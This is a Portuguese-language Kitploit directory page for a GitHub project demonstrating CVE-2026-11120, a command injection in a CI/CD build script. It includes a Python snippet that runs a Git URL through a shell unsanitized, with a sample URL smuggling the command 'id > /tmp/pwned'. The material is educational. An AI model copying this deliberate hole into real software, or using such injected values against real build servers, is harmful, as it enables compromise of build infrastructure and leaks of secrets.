Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline — Demonstra injeção de comandos por meio de URLs Git não sanitizadas em pipelines de CI/CD, incluindo um script de build vulnerável e um exemplo de exploit para uma CVE crítica. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline
Análise de VulnerabilidadesExploraçãoDevSecOpsAprendizado e Educação
GitHubgeorge0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline

CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline

Demonstra injeção de comandos por meio de URLs Git não sanitizadas em pipelines de CI/CD, incluindo um script de build vulnerável e um exemplo de exploit para uma CVE crítica.

Ver Repositório
1há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-11120 – Injeção de Comando via URL do Git no Pipeline de CI/CD

Código do Programa (Python)

root@kitploit:~
# cicd_build.py - Clones repository without sanitizing URL
import subprocess, sys

def clone_and_build(repo_url):
    # Vulnerability: repo_url can contain shell metacharacters
    cmd = f"git clone {repo_url} /tmp/repo"
    subprocess.check_call(cmd, shell=True)
    # Build steps...

if __name__ == '__main__':
    # Simulate attacker-controlled input
    malicious_url = "https://github.com/org/repo.git; id > /tmp/pwned"
    clone_and_build(malicious_url)

CVE-2026-11120 – Injeção de Comando via URL do Git em CI/CD

Severity: Critical

Visão Geral

Um script de pipeline de CI/CD usa URLs de repositório Git fornecidas pelo usuário sem sanitização em um comando shell. Um atacante pode injetar comandos shell incluindo caracteres especiais (por exemplo, ;, &&) na URL, levando à execução arbitrária de comandos no servidor de build.

Detalhes da Vulnerabilidade

  • Tipo: Injeção de Comando
  • Impacto: Comprometimento da infraestrutura de build, vazamento de segredos.
  • Causa raiz: A URL do repositório é concatenada diretamente em um comando shell sem escape ou validação.

Demonstração do Exploit

Execute o script vulnerável:

root@kitploit:~
python cicd_build.py

Ele executa o comando id injetado, criando /tmp/pwned.

Baixar ferramenta